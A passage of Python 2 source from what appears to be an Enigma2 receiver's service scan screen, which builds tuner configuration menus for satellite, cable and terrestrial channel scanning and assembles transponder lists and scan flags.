if nim.isCompatible("DVB-S"):
if self.scan_type.value == "single_transponder":
self.updateSatList()
if nim.isCompatible("DVB-S2"):
self.systemEntry = getConfigListEntry(_('System'), self.scan_sat.system)
self.list.append(self.systemEntry)
else:
# downgrade to dvb-s, in case a -s2 config was active
self.scan_sat.system.value = eDVBFrontendParametersSatellite.System_DVB_S
self.list.append(getConfigListEntry(_('Satellite'), self.scan_satselection[index_to_scan]))
self.list.append(getConfigListEntry(_('Frequency'), self.scan_sat.frequency))
self.list.append(getConfigListEntry(_('Inversion'), self.scan_sat.inversion))
self.list.append(getConfigListEntry(_('Symbol rate'), self.scan_sat.symbolrate))
self.list.append(getConfigListEntry(_('Polarization'), self.scan_sat.polarization))
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S:
self.list.append(getConfigListEntry(_("FEC"), self.scan_sat.fec))
elif self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S2:
self.list.append(getConfigListEntry(_("FEC"), self.scan_sat.fec_s2))
self.modulationEntry = getConfigListEntry(_('Modulation'), self.scan_sat.modulation)
self.list.append(self.modulationEntry)
self.list.append(getConfigListEntry(_('Roll-off'), self.scan_sat.rolloff))
self.list.append(getConfigListEntry(_('Pilot'), self.scan_sat.pilot))
elif self.scan_type.value == "predefined_transponder" and self.satList[index_to_scan]:
self.updateSatList()
self.preDefSatList = getConfigListEntry(_('Satellite'), self.scan_satselection[index_to_scan])
self.list.append(self.preDefSatList)
sat = self.satList[index_to_scan][self.scan_satselection[index_to_scan].index]
self.predefinedTranspondersList(sat[0])
self.list.append(getConfigListEntry(_('Transponder'), self.preDefTransponders))
elif self.scan_type.value == "single_satellite":
self.updateSatList()
print self.scan_satselection[index_to_scan]
self.list.append(getConfigListEntry(_("Satellite"), self.scan_satselection[index_to_scan]))
self.scan_networkScan.value = True
elif "multisat" in self.scan_type.value:
tlist = []
SatList = nimmanager.getSatListForNim(index_to_scan)
for x in SatList:
if self.Satexists(tlist, x[0]) == 0:
tlist.append(x[0])
sat = ConfigEnableDisable(default = "_yes" in self.scan_type.value and True or False)
configEntry = getConfigListEntry(nimmanager.getSatDescription(x[0]), sat)
self.list.append(configEntry)
self.multiscanlist.append((x[0], sat))
self.scan_networkScan.value = True
elif nim.isCompatible("DVB-C"):
if self.scan_typecable.value == "single_transponder":
self.list.append(getConfigListEntry(_("Frequency"), self.scan_cab.frequency))
self.list.append(getConfigListEntry(_("Inversion"), self.scan_cab.inversion))
self.list.append(getConfigListEntry(_("Symbol rate"), self.scan_cab.symbolrate))
self.list.append(getConfigListEntry(_("Modulation"), self.scan_cab.modulation))
self.list.append(getConfigListEntry(_("FEC"), self.scan_cab.fec))
elif self.scan_typecable.value == "predefined_transponder":
self.predefinedCabTranspondersList()
self.list.append(getConfigListEntry(_('Transponder'), self.CableTransponders))
if config.Nims[index_to_scan].cable.scan_networkid.value:
self.networkid = config.Nims[index_to_scan].cable.scan_networkid.value
self.scan_networkScan.value = True
elif nim.isCompatible("DVB-T"):
if self.scan_typeterrestrial.value == "single_transponder":
if nim.isCompatible("DVB-T2"):
self.systemEntry = getConfigListEntry(_('System'), self.scan_ter.system)
self.list.append(self.systemEntry)
else:
self.scan_ter.system.value = eDVBFrontendParametersTerrestrial.System_DVB_T
if self.ter_channel_input and self.scan_input_as.value == "channel":
channel = channelnumbers.getChannelNumber(self.scan_ter.frequency.value*1000, self.ter_tnumber)
if channel:
self.scan_ter.channel.value = int(channel.replace("+","").replace("-",""))
self.list.append(getConfigListEntry(_("Channel"), self.scan_ter.channel))
else:
prev_val = self.scan_ter.frequency.value
self.scan_ter.frequency.value = channelnumbers.channel2frequency(self.scan_ter.channel.value, self.ter_tnumber)/1000
if self.scan_ter.frequency.value == 474000:
self.scan_ter.frequency.value = prev_val
self.list.append(getConfigListEntry(_("Frequency"), self.scan_ter.frequency))
self.list.append(getConfigListEntry(_("Inversion"), self.scan_ter.inversion))
self.list.append(getConfigListEntry(_("Bandwidth"), self.scan_ter.bandwidth))
self.list.append(getConfigListEntry(_("Code rate HP"), self.scan_ter.fechigh))
self.list.append(getConfigListEntry(_("Code rate LP"), self.scan_ter.feclow))
self.list.append(getConfigListEntry(_("Modulation"), self.scan_ter.modulation))
self.list.append(getConfigListEntry(_("Transmission mode"), self.scan_ter.transmission))
self.list.append(getConfigListEntry(_("Guard interval"), self.scan_ter.guard))
self.list.append(getConfigListEntry(_("Hierarchy info"), self.scan_ter.hierarchy))
if self.scan_ter.system.value == eDVBFrontendParametersTerrestrial.System_DVB_T2:
self.list.append(getConfigListEntry(_('PLP ID'), self.scan_ter.plp_id))
elif self.scan_typeterrestrial.value == "predefined_transponder":
self.TerrestrialRegion = self.terrestrial_nims_regions[index_to_scan]
self.TerrestrialRegionEntry = getConfigListEntry(_('Region'), self.TerrestrialRegion)
self.list.append(self.TerrestrialRegionEntry)
self.predefinedTerrTranspondersList()
self.list.append(getConfigListEntry(_('Transponder'), self.TerrestrialTransponders))
elif self.scan_typeterrestrial.value == "complete":
self.TerrestrialRegion = self.terrestrial_nims_regions[index_to_scan]
self.TerrestrialRegionEntry = getConfigListEntry(_('Region'), self.TerrestrialRegion)
self.list.append(self.TerrestrialRegionEntry)
self.list.append(getConfigListEntry(_("Network scan"), self.scan_networkScan))
self.list.append(getConfigListEntry(_("Clear before scan"), self.scan_clearallservices))
self.list.append(getConfigListEntry(_("Only free scan"), self.scan_onlyfree))
self["config"].list = self.list
self["config"].l.setList(self.list)
def Satexists(self, tlist, pos):
for x in tlist:
if x == pos:
return 1
return 0
def newConfig(self):
cur = self["config"].getCurrent()
print "cur is", cur
if cur == self.typeOfScanEntry or \
cur == self.typeOfInputEntry or \
cur == self.tunerEntry or \
cur == self.systemEntry or \
cur == self.preDefSatList or \
cur == self.TerrestrialRegionEntry or \
(self.modulationEntry and self.systemEntry[1].value == eDVBFrontendParametersSatellite.System_DVB_S2 and cur == self.modulationEntry):
self.createSetup()
def createConfig(self, frontendData):
defaultSat = {
"orbpos": 192,
"system": eDVBFrontendParametersSatellite.System_DVB_S,
"frequency": 11836,
"inversion": eDVBFrontendParametersSatellite.Inversion_Unknown,
"symbolrate": 27500,
"polarization": eDVBFrontendParametersSatellite.Polarisation_Horizontal,
"fec": eDVBFrontendParametersSatellite.FEC_Auto,
"fec_s2": eDVBFrontendParametersSatellite.FEC_9_10,
"modulation": eDVBFrontendParametersSatellite.Modulation_QPSK }
defaultCab = {
"frequency": 466,
"inversion": eDVBFrontendParametersCable.Inversion_Unknown,
"modulation": eDVBFrontendParametersCable.Modulation_QAM64,
"fec": eDVBFrontendParametersCable.FEC_Auto,
"symbolrate": 6900,
"system": eDVBFrontendParametersCable.System_DVB_C_ANNEX_A }
defaultTer = {
"frequency" : 474000,
"inversion" : eDVBFrontendParametersTerrestrial.Inversion_Unknown,
"bandwidth" : 8000000,
"fechigh" : eDVBFrontendParametersTerrestrial.FEC_Auto,
"feclow" : eDVBFrontendParametersTerrestrial.FEC_Auto,
"modulation" : eDVBFrontendParametersTerrestrial.Modulation_Auto,
"transmission_mode" : eDVBFrontendParametersTerrestrial.TransmissionMode_Auto,
"guard_interval" : eDVBFrontendParametersTerrestrial.GuardInterval_Auto,
"hierarchy": eDVBFrontendParametersTerrestrial.Hierarchy_Auto,
"system": eDVBFrontendParametersTerrestrial.System_DVB_T,
"plp_id": 0 }
if frontendData is not None:
ttype = frontendData.get("tuner_type", "UNKNOWN")
if ttype == "DVB-S":
defaultSat["system"] = frontendData.get("system", eDVBFrontendParametersSatellite.System_DVB_S)
defaultSat["frequency"] = frontendData.get("frequency", 0) / 1000
defaultSat["inversion"] = frontendData.get("inversion", eDVBFrontendParametersSatellite.Inversion_Unknown)
defaultSat["symbolrate"] = frontendData.get("symbol_rate", 0) / 1000
defaultSat["polarization"] = frontendData.get("polarization", eDVBFrontendParametersSatellite.Polarisation_Horizontal)
if defaultSat["system"] == eDVBFrontendParametersSatellite.System_DVB_S2:
defaultSat["fec_s2"] = frontendData.get("fec_inner", eDVBFrontendParametersSatellite.FEC_Auto)
defaultSat["rolloff"] = frontendData.get("rolloff", eDVBFrontendParametersSatellite.RollOff_alpha_0_35)
defaultSat["pilot"] = frontendData.get("pilot", eDVBFrontendParametersSatellite.Pilot_Unknown)
else:
defaultSat["fec"] = frontendData.get("fec_inner", eDVBFrontendParametersSatellite.FEC_Auto)
defaultSat["modulation"] = frontendData.get("modulation", eDVBFrontendParametersSatellite.Modulation_QPSK)
defaultSat["orbpos"] = frontendData.get("orbital_position", 0)
elif ttype == "DVB-C":
defaultCab["frequency"] = frontendData.get("frequency", 0) / 1000
defaultCab["symbolrate"] = frontendData.get("symbol_rate", 0) / 1000
defaultCab["inversion"] = frontendData.get("inversion", eDVBFrontendParametersCable.Inversion_Unknown)
defaultCab["fec"] = frontendData.get("fec_inner", eDVBFrontendParametersCable.FEC_Auto)
defaultCab["modulation"] = frontendData.get("modulation", eDVBFrontendParametersCable.Modulation_QAM16)
defaultCab["system"] = frontendData.get("system", eDVBFrontendParametersCable.System_DVB_C_ANNEX_A)
elif ttype == "DVB-T":
defaultTer["frequency"] = frontendData.get("frequency", 47400000) / 1000
defaultTer["inversion"] = frontendData.get("inversion", eDVBFrontendParametersTerrestrial.Inversion_Unknown)
defaultTer["bandwidth"] = frontendData.get("bandwidth", 8000000)
defaultTer["fechigh"] = frontendData.get("code_rate_hp", eDVBFrontendParametersTerrestrial.FEC_Auto)
defaultTer["feclow"] = frontendData.get("code_rate_lp", eDVBFrontendParametersTerrestrial.FEC_Auto)
defaultTer["modulation"] = frontendData.get("constellation", eDVBFrontendParametersTerrestrial.Modulation_Auto)
defaultTer["transmission_mode"] = frontendData.get("transmission_mode", eDVBFrontendParametersTerrestrial.TransmissionMode_Auto)
defaultTer["guard_interval"] = frontendData.get("guard_interval", eDVBFrontendParametersTerrestrial.GuardInterval_Auto)
defaultTer["hierarchy"] = frontendData.get("hierarchy_information", eDVBFrontendParametersTerrestrial.Hierarchy_Auto)
defaultTer["system"] = frontendData.get("system", eDVBFrontendParametersTerrestrial.System_DVB_T)
defaultTer["plp_id"] = frontendData.get("plp_id", 0)
self.scan_sat = ConfigSubsection()
self.scan_cab = ConfigSubsection()
self.scan_ter = ConfigSubsection()
nim_list = []
# collect all nims which are *not* set to "nothing"
for n in nimmanager.nim_slots:
if n.config_mode == "nothing":
continue
if n.config_mode == "advanced" and len(nimmanager.getSatListForNim(n.slot)) < 1:
continue
if n.config_mode in ("loopthrough", "satposdepends"):
root_id = nimmanager.sec.getRoot(n.slot_id, int(n.config.connectedTo.value))
if n.type == nimmanager.nim_slots[root_id].type: # check if connected from a DVB-S to DVB-S2 Nim or vice versa
continue
nim_list.append((str(n.slot), n.friendly_full_description))
self.scan_nims = ConfigSelection(choices = nim_list)
if frontendData is not None and len(nim_list) > 0:
self.scan_nims.setValue(str(frontendData.get("tuner_number", nim_list[0][0])))
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-T"):
self.ter_tnumber = slot.slot
if self.ter_tnumber is not None:
self.ter_channel_input = channelnumbers.supportedChannels(self.ter_tnumber)
# status
self.scan_snr = ConfigSlider()
self.scan_snr.enabled = False
self.scan_agc = ConfigSlider()
self.scan_agc.enabled = False
self.scan_ber = ConfigSlider()
self.scan_ber.enabled = False
# sat
self.scan_sat.system = ConfigSelection(default = defaultSat["system"], choices = [
(eDVBFrontendParametersSatellite.System_DVB_S, _("DVB-S")),
(eDVBFrontendParametersSatellite.System_DVB_S2, _("DVB-S2"))])
self.scan_sat.frequency = ConfigInteger(default = defaultSat["frequency"], limits = (1, 99999))
self.scan_sat.inversion = ConfigSelection(default = defaultSat["inversion"], choices = [
(eDVBFrontendParametersSatellite.Inversion_Off, _("Off")),
(eDVBFrontendParametersSatellite.Inversion_On, _("On")),
(eDVBFrontendParametersSatellite.Inversion_Unknown, _("Auto"))])
self.scan_sat.symbolrate = ConfigInteger(default = defaultSat["symbolrate"], limits = (1, 99999))
self.scan_sat.polarization = ConfigSelection(default = defaultSat["polarization"], choices = [
(eDVBFrontendParametersSatellite.Polarisation_Horizontal, _("horizontal")),
(eDVBFrontendParametersSatellite.Polarisation_Vertical, _("vertical")),
(eDVBFrontendParametersSatellite.Polarisation_CircularLeft, _("circular left")),
(eDVBFrontendParametersSatellite.Polarisation_CircularRight, _("circular right"))])
self.scan_sat.fec = ConfigSelection(default = defaultSat["fec"], choices = [
(eDVBFrontendParametersSatellite.FEC_Auto, _("Auto")),
(eDVBFrontendParametersSatellite.FEC_1_2, "1/2"),
(eDVBFrontendParametersSatellite.FEC_2_3, "2/3"),
(eDVBFrontendParametersSatellite.FEC_3_4, "3/4"),
(eDVBFrontendParametersSatellite.FEC_5_6, "5/6"),
(eDVBFrontendParametersSatellite.FEC_7_8, "7/8"),
(eDVBFrontendParametersSatellite.FEC_None, _("None"))])
self.scan_sat.fec_s2 = ConfigSelection(default = defaultSat["fec_s2"], choices = [
(eDVBFrontendParametersSatellite.FEC_Auto, _("Auto")),
(eDVBFrontendParametersSatellite.FEC_1_2, "1/2"),
(eDVBFrontendParametersSatellite.FEC_2_3, "2/3"),
(eDVBFrontendParametersSatellite.FEC_3_4, "3/4"),
(eDVBFrontendParametersSatellite.FEC_3_5, "3/5"),
(eDVBFrontendParametersSatellite.FEC_4_5, "4/5"),
(eDVBFrontendParametersSatellite.FEC_5_6, "5/6"),
(eDVBFrontendParametersSatellite.FEC_7_8, "7/8"),
(eDVBFrontendParametersSatellite.FEC_8_9, "8/9"),
(eDVBFrontendParametersSatellite.FEC_9_10, "9/10")])
self.scan_sat.modulation = ConfigSelection(default = defaultSat["modulation"], choices = [
(eDVBFrontendParametersSatellite.Modulation_QPSK, "QPSK"),
(eDVBFrontendParametersSatellite.Modulation_8PSK, "8PSK")])
self.scan_sat.rolloff = ConfigSelection(default = defaultSat.get("rolloff", eDVBFrontendParametersSatellite.RollOff_alpha_0_35), choices = [
(eDVBFrontendParametersSatellite.RollOff_alpha_0_35, "0.35"),
(eDVBFrontendParametersSatellite.RollOff_alpha_0_25, "0.25"),
(eDVBFrontendParametersSatellite.RollOff_alpha_0_20, "0.20"),
(eDVBFrontendParametersSatellite.RollOff_auto, _("Auto"))])
self.scan_sat.pilot = ConfigSelection(default = defaultSat.get("pilot", eDVBFrontendParametersSatellite.Pilot_Unknown), choices = [
(eDVBFrontendParametersSatellite.Pilot_Off, _("Off")),
(eDVBFrontendParametersSatellite.Pilot_On, _("On")),
(eDVBFrontendParametersSatellite.Pilot_Unknown, _("Auto"))])
# cable
self.scan_cab.frequency = ConfigInteger(default = defaultCab["frequency"], limits = (50, 999))
self.scan_cab.inversion = ConfigSelection(default = defaultCab["inversion"], choices = [
(eDVBFrontendParametersCable.Inversion_Off, _("Off")),
(eDVBFrontendParametersCable.Inversion_On, _("On")),
(eDVBFrontendParametersCable.Inversion_Unknown, _("Auto"))])
self.scan_cab.modulation = ConfigSelection(default = defaultCab["modulation"], choices = [
(eDVBFrontendParametersCable.Modulation_QAM16, "16-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM32, "32-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM64, "64-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM128, "128-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM256, "256-QAM")])
self.scan_cab.fec = ConfigSelection(default = defaultCab["fec"], choices = [
(eDVBFrontendParametersCable.FEC_Auto, _("Auto")),
(eDVBFrontendParametersCable.FEC_1_2, "1/2"),
(eDVBFrontendParametersCable.FEC_2_3, "2/3"),
(eDVBFrontendParametersCable.FEC_3_4, "3/4"),
(eDVBFrontendParametersCable.FEC_5_6, "5/6"),
(eDVBFrontendParametersCable.FEC_7_8, "7/8"),
(eDVBFrontendParametersCable.FEC_8_9, "8/9"),
(eDVBFrontendParametersCable.FEC_3_5, "3/5"),
(eDVBFrontendParametersCable.FEC_4_5, "4/5"),
(eDVBFrontendParametersCable.FEC_9_10, "9/10"),
(eDVBFrontendParametersCable.FEC_None, _("None"))])
self.scan_cab.symbolrate = ConfigInteger(default = defaultCab["symbolrate"], limits = (1, 99999))
self.scan_cab.system = ConfigSelection(default = defaultCab["system"], choices = [
(eDVBFrontendParametersCable.System_DVB_C_ANNEX_A, _("DVB-C")),
(eDVBFrontendParametersCable.System_DVB_C_ANNEX_C, _("DVB-C ANNEX C"))])
		# terrestrial
self.scan_ter.frequency = ConfigInteger(default = defaultTer["frequency"], limits = (50000, 999000))
self.scan_ter.channel = ConfigInteger(default = 21, limits = (1, 99))
self.scan_ter.inversion = ConfigSelection(default = defaultTer["inversion"], choices = [
(eDVBFrontendParametersTerrestrial.Inversion_Off, _("Off")),
(eDVBFrontendParametersTerrestrial.Inversion_On, _("On")),
(eDVBFrontendParametersTerrestrial.Inversion_Unknown, _("Auto"))])
# WORKAROUND: we can't use BW-auto
self.scan_ter.bandwidth = ConfigSelection(default = defaultTer["bandwidth"], choices = [
(1712000, "1.712MHz"),
(5000000, "5MHz"),
(6000000, "6MHz"),
(7000000, "7MHz"),
(8000000, "8MHz"),
(10000000, "10MHz")
])
#, (eDVBFrontendParametersTerrestrial.Bandwidth_Auto, _("Auto"))))
self.scan_ter.fechigh = ConfigSelection(default = defaultTer["fechigh"], choices = [
(eDVBFrontendParametersTerrestrial.FEC_1_2, "1/2"),
(eDVBFrontendParametersTerrestrial.FEC_2_3, "2/3"),
(eDVBFrontendParametersTerrestrial.FEC_3_4, "3/4"),
(eDVBFrontendParametersTerrestrial.FEC_5_6, "5/6"),
(eDVBFrontendParametersTerrestrial.FEC_6_7, "6/7"),
(eDVBFrontendParametersTerrestrial.FEC_7_8, "7/8"),
(eDVBFrontendParametersTerrestrial.FEC_8_9, "8/9"),
(eDVBFrontendParametersTerrestrial.FEC_Auto, _("Auto"))])
self.scan_ter.feclow = ConfigSelection(default = defaultTer["feclow"], choices = [
(eDVBFrontendParametersTerrestrial.FEC_1_2, "1/2"),
(eDVBFrontendParametersTerrestrial.FEC_2_3, "2/3"),
(eDVBFrontendParametersTerrestrial.FEC_3_4, "3/4"),
(eDVBFrontendParametersTerrestrial.FEC_5_6, "5/6"),
(eDVBFrontendParametersTerrestrial.FEC_6_7, "6/7"),
(eDVBFrontendParametersTerrestrial.FEC_7_8, "7/8"),
(eDVBFrontendParametersTerrestrial.FEC_8_9, "8/9"),
(eDVBFrontendParametersTerrestrial.FEC_Auto, _("Auto"))])
self.scan_ter.modulation = ConfigSelection(default = defaultTer["modulation"], choices = [
(eDVBFrontendParametersTerrestrial.Modulation_QPSK, "QPSK"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM16, "QAM16"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM64, "QAM64"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM256, "QAM256"),
(eDVBFrontendParametersTerrestrial.Modulation_Auto, _("Auto"))])
self.scan_ter.transmission = ConfigSelection(default = defaultTer["transmission_mode"], choices = [
(eDVBFrontendParametersTerrestrial.TransmissionMode_1k, "1K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_2k, "2K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_4k, "4K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_8k, "8K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_16k, "16K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_32k, "32K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_Auto, _("Auto"))])
self.scan_ter.guard = ConfigSelection(default = defaultTer["guard_interval"], choices = [
(eDVBFrontendParametersTerrestrial.GuardInterval_1_32, "1/32"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_16, "1/16"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_8, "1/8"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_4, "1/4"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_128, "1/128"),
(eDVBFrontendParametersTerrestrial.GuardInterval_19_128, "19/128"),
(eDVBFrontendParametersTerrestrial.GuardInterval_19_256, "19/256"),
(eDVBFrontendParametersTerrestrial.GuardInterval_Auto, _("Auto"))])
self.scan_ter.hierarchy = ConfigSelection(default = defaultTer["hierarchy"], choices = [
(eDVBFrontendParametersTerrestrial.Hierarchy_None, _("None")),
(eDVBFrontendParametersTerrestrial.Hierarchy_1, "1"),
(eDVBFrontendParametersTerrestrial.Hierarchy_2, "2"),
(eDVBFrontendParametersTerrestrial.Hierarchy_4, "4"),
(eDVBFrontendParametersTerrestrial.Hierarchy_Auto, _("Auto"))])
self.scan_ter.system = ConfigSelection(default = defaultTer["system"], choices = [
(eDVBFrontendParametersTerrestrial.System_DVB_T, _("DVB-T")),
(eDVBFrontendParametersTerrestrial.System_DVB_T2, _("DVB-T2"))])
self.scan_ter.plp_id = ConfigInteger(default = defaultTer["plp_id"], limits = (0, 255))
self.scan_scansat = {}
for sat in nimmanager.satList:
#print sat[1]
self.scan_scansat[sat[0]] = ConfigYesNo(default = False)
self.scan_satselection = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-S"):
self.scan_satselection.append(getConfigSatlist(defaultSat["orbpos"], self.satList[slot.slot]))
else:
self.scan_satselection.append(None)
self.terrestrial_nims_regions = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-T"):
self.terrestrial_nims_regions.append(self.getTerrestrialRegionsList(slot.slot))
else:
self.terrestrial_nims_regions.append(None)
if frontendData is not None and ttype == "DVB-S" and self.predefinedTranspondersList(defaultSat["orbpos"]) is not None:
defaultSatSearchType = "predefined_transponder"
else:
defaultSatSearchType = "single_transponder"
if frontendData is not None and ttype == "DVB-T" and self.predefinedTerrTranspondersList() is not None:
defaultTerrSearchType = "predefined_transponder"
else:
defaultTerrSearchType = "single_transponder"
if frontendData is not None and ttype == "DVB-C" and self.predefinedCabTranspondersList() is not None:
defaultCabSearchType = "predefined_transponder"
else:
defaultCabSearchType = "single_transponder"
self.scan_type = ConfigSelection(default = defaultSatSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("single_satellite", _("Single satellite")), ("multisat", _("Multisat")), ("multisat_yes", _("Multisat all select"))])
self.scan_typecable = ConfigSelection(default = defaultCabSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("complete", _("Complete"))])
self.last_scan_typecable = "single_transponder"
self.cable_toggle = {"single_transponder":"complete", "complete":"single_transponder"}
self.scan_typeterrestrial = ConfigSelection(default = defaultTerrSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("complete", _("Complete"))])
self.scan_input_as = ConfigSelection(default = "channel", choices = [("frequency", _("Frequency")), ("channel", _("Channel"))])
self.scan_clearallservices = ConfigSelection(default = "no", choices = [("no", _("no")), ("yes", _("yes")), ("yes_hold_feeds", _("yes (keep feeds)"))])
self.scan_onlyfree = ConfigYesNo(default = False)
self.scan_networkScan = ConfigYesNo(default = False)
return True
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.newConfig()
def handleKeyFileCallback(self, answer):
ConfigListScreen.handleKeyFileCallback(self, answer)
self.newConfig()
def updateStatus(self):
print "updatestatus"
def addSatTransponder(self, tlist, frequency, symbol_rate, polarisation, fec, inversion, orbital_position, system, modulation, rolloff, pilot):
print "Add Sat: frequ: " + str(frequency) + " symbol: " + str(symbol_rate) + " pol: " + str(polarisation) + " fec: " + str(fec) + " inversion: " + str(inversion) + " modulation: " + str(modulation) + " system: " + str(system) + " rolloff" + str(rolloff) + " pilot" + str(pilot)
print "orbpos: " + str(orbital_position)
parm = eDVBFrontendParametersSatellite()
parm.modulation = modulation
parm.system = system
parm.frequency = frequency * 1000
parm.symbol_rate = symbol_rate * 1000
parm.polarisation = polarisation
parm.fec = fec
parm.inversion = inversion
parm.orbital_position = orbital_position
parm.rolloff = rolloff
parm.pilot = pilot
tlist.append(parm)
def addCabTransponder(self, tlist, frequency, symbol_rate, modulation, fec, inversion):
print "Add Cab: frequ: " + str(frequency) + " symbol: " + str(symbol_rate) + " pol: " + str(modulation) + " fec: " + str(fec) + " inversion: " + str(inversion)
parm = eDVBFrontendParametersCable()
parm.frequency = frequency
parm.symbol_rate = symbol_rate
parm.modulation = modulation
parm.fec_inner = fec
parm.inversion = inversion
tlist.append(parm)
def addTerTransponder(self, tlist, *args, **kwargs):
tlist.append(buildTerTransponder(*args, **kwargs))
def keyGo(self):
infoBarInstance = InfoBar.instance
if infoBarInstance:
infoBarInstance.checkTimeshiftRunning(self.keyGoCheckTimeshiftCallback)
else:
self.keyGoCheckTimeshiftCallback(True)
def keyGoCheckTimeshiftCallback(self, answer):
START_SCAN = 0
SEARCH_CABLE_TRANSPONDERS = 1
SEARCH_TERRESTRIAL2_TRANSPONDERS = 2
		if not answer:
			return
tlist = []
flags = None
removeAll = True
action = START_SCAN
		if not self.scan_nims.value:
			self.session.open(MessageBox, _("No tuner is enabled!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
			return
		index_to_scan = int(self.scan_nims.value)
nim = nimmanager.nim_slots[index_to_scan]
print "nim", nim.slot
if nim.isCompatible("DVB-S"):
print "is compatible with DVB-S"
if self.scan_type.value == "single_transponder":
				# these lists are generated for each tuner, so this has to work.
assert len(self.satList) > index_to_scan
assert len(self.scan_satselection) > index_to_scan
nimsats = self.satList[index_to_scan]
selsatidx = self.scan_satselection[index_to_scan].index
# however, the satList itself could be empty. in that case, "index" is 0 (for "None").
if len(nimsats):
orbpos = nimsats[selsatidx][0]
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S:
fec = self.scan_sat.fec.value
else:
fec = self.scan_sat.fec_s2.value
print "add sat transponder"
self.addSatTransponder(tlist, self.scan_sat.frequency.value,
self.scan_sat.symbolrate.value,
self.scan_sat.polarization.value,
fec,
self.scan_sat.inversion.value,
orbpos,
self.scan_sat.system.value,
self.scan_sat.modulation.value,
self.scan_sat.rolloff.value,
self.scan_sat.pilot.value)
removeAll = False
elif self.scan_type.value == "predefined_transponder":
nimsats = self.satList[index_to_scan]
selsatidx = self.scan_satselection[index_to_scan].index
if len(nimsats):
orbpos = nimsats[selsatidx][0]
tps = nimmanager.getTransponders(orbpos)
if len(tps) and len(tps) > self.preDefTransponders.index:
tp = tps[self.preDefTransponders.index]
self.addSatTransponder(tlist, tp[1] / 1000, tp[2] / 1000, tp[3], tp[4], tp[7], orbpos, tp[5], tp[6], tp[8], tp[9])
removeAll = False
elif self.scan_type.value == "single_satellite":
sat = self.satList[index_to_scan][self.scan_satselection[index_to_scan].index]
getInitialTransponderList(tlist, sat[0])
elif "multisat" in self.scan_type.value:
SatList = nimmanager.getSatListForNim(index_to_scan)
for x in self.multiscanlist:
if x[1].value:
print " " + str(x[0])
getInitialTransponderList(tlist, x[0])
elif nim.isCompatible("DVB-C"):
if self.scan_typecable.value == "single_transponder":
self.addCabTransponder(tlist, self.scan_cab.frequency.value*1000,
self.scan_cab.symbolrate.value*1000,
self.scan_cab.modulation.value,
self.scan_cab.fec.value,
self.scan_cab.inversion.value)
removeAll = False
elif self.scan_typecable.value == "predefined_transponder":
tps = nimmanager.getTranspondersCable(index_to_scan)
				if len(tps) and len(tps) > self.CableTransponders.index:
tp = tps[self.CableTransponders.index]
# 0 transponder type, 1 freq, 2 sym, 3 mod, 4 fec, 5 inv, 6 sys
self.addCabTransponder(tlist, tp[1], tp[2], tp[3], tp[4], tp[5])
removeAll = False
elif self.scan_typecable.value == "complete":
if config.Nims[index_to_scan].cable.scan_type.value == "provider":
getInitialCableTransponderList(tlist, index_to_scan)
else:
action = SEARCH_CABLE_TRANSPONDERS
elif nim.isCompatible("DVB-T"):
if self.scan_typeterrestrial.value == "single_transponder":
if self.scan_input_as.value == "channel":
frequency = channelnumbers.channel2frequency(self.scan_ter.channel.value, self.ter_tnumber)
else:
frequency = self.scan_ter.frequency.value * 1000
self.addTerTransponder(tlist,
frequency,
inversion = self.scan_ter.inversion.value,
bandwidth = self.scan_ter.bandwidth.value,
fechigh = self.scan_ter.fechigh.value,
feclow = self.scan_ter.feclow.value,
modulation = self.scan_ter.modulation.value,
transmission = self.scan_ter.transmission.value,
guard = self.scan_ter.guard.value,
hierarchy = self.scan_ter.hierarchy.value,
system = self.scan_ter.system.value,
plpid = self.scan_ter.plp_id.value)
removeAll = False
elif self.scan_typeterrestrial.value == "predefined_transponder":
if self.TerrestrialTransponders is not None:
region = self.terrestrial_nims_regions[index_to_scan].value
tps = nimmanager.getTranspondersTerrestrial(region)
					if len(tps) and len(tps) > self.TerrestrialTransponders.index:
tp = tps[self.TerrestrialTransponders.index]
tlist.append(buildTerTransponder(tp[1], tp[9], tp[2], tp[4], tp[5], tp[3], tp[7], tp[6], tp[8], tp[10], tp[11]))
removeAll = False
elif self.scan_typeterrestrial.value == "complete":
skip_t2 = False
				if getMachineBrand() in ('Vu+',):
skip_t2 = True
if nim.isCompatible("DVB-T2"):
scan_util = len(self.terrestrialTransponderGetCmd(nim.slot)) and True or False
if scan_util:
action = SEARCH_TERRESTRIAL2_TRANSPONDERS
else:
skip_t2 = False
getInitialTerrestrialTransponderList(tlist, self.TerrestrialRegion.value, skip_t2)
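		# translate the UI choices into eComponentScan flag bits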
flags = self.scan_networkScan.value and eComponentScan.scanNetworkSearch or 0
tmp = self.scan_clearallservices.value
if tmp == "yes":
flags |= eComponentScan.scanRemoveServices
elif tmp == "yes_hold_feeds":
flags |= eComponentScan.scanRemoveServices
flags |= eComponentScan.scanDontRemoveFeeds
if tmp != "no" and not removeAll:
flags |= eComponentScan.scanDontRemoveUnscanned
